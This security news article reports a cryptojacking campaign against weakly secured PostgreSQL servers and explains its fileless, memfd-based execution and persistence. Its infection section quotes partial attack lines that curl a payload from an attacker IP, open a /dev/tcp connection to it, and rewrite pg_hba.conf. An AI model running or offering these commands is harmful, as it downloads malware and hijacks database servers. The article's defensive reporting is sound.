A widespread cryptojacking campaign targeting poorly secured PostgreSQL database servers has impacted over 1,500 victims globally.
The attack leverages fileless execution techniques and credential brute-forcing to deploy Monero (XMR)-mining malware while evading traditional cloud workload protection (CWPP) tools.
Security analysts attribute the campaign to threat actor JINX-0126, which has refined its tactics since initial observations by Aqua Security in late 2024.
.png
)
The attackers exploit PostgreSQL instances exposed online with weak or default credentials, a configuration affecting 30% of cloud-hosted PostgreSQL servers.
After gaining access, they abuse PostgreSQL’s COPY FROM PROGRAM function to execute shell commands, bypassing typical file-write detection methods.
This enables the deployment of a multi-stage payload chain featuring UPX-packed Golang binaries masquerading as legitimate PostgreSQL processes.
.webp)
Wiz Threat Research analysts identified three cryptocurrency wallets linked to the campaign, each showing ~550 active mining workers via C3Pool telemetry.
At peak activity, the operation generated 4.04 GH/s of hashrate – equivalent to ~€10.40/hour in XMR revenue at current valuations.
While financially motivated, the attack’s fileless design and system reconfigurations create persistent backdoors for potential escalation to ransomware or data exfiltration.
Infection Mechanism and Defense Evasion
The attack begins with credential spraying against PostgreSQL’s default postgres account and other common usernames.
Successful logins trigger this SQL injection to fetch the initial payload:-
COPY FROM PROGRAM 'kill -9 $(pgrep zsvc) [...] curl -ksS 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv -o pg_core'This script terminates competing cryptominers like kinsing and kdevtmpfsi before retrieving the pg_core binary.
Unlike conventional malware, the payload cpu_hu (Figure 2: Process Tree) executes entirely in memory via Linux’s memfd subsystem, leaving minimal disk artifacts:-
exec 5<>/dev/tcp/159.223.123.175/36287 [...] cat) postmasterTo ensure persistence, the malware modifies PostgreSQL’s pg_hba.conf to block external authentication attempts while granting local network access:-
host all pgg_superadmins all reject
host all all 127.0.0.1/8 trust Concurrently, it creates cronjobs for minute-by-minute reactivation and deploys a privileged user psql_sys via CREATE ROLE.
Each binary contains unique configuration blobs encrypted with AES-256, ensuring every victim’s payload has distinct hashes to evade signature-based detection.
This campaign underscores critical cloud security gaps: 90% of environments host PostgreSQL instances, many with inadequate access controls.
Wiz recommends enforcing network-level restrictions, auditing credentials, and implementing runtime monitoring for memfd-based execution – a key IoC flagged in their advisory.
With opportunistic attacks increasingly targeting databases, organizations must prioritize configuration hygiene alongside behavioral threat detection.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
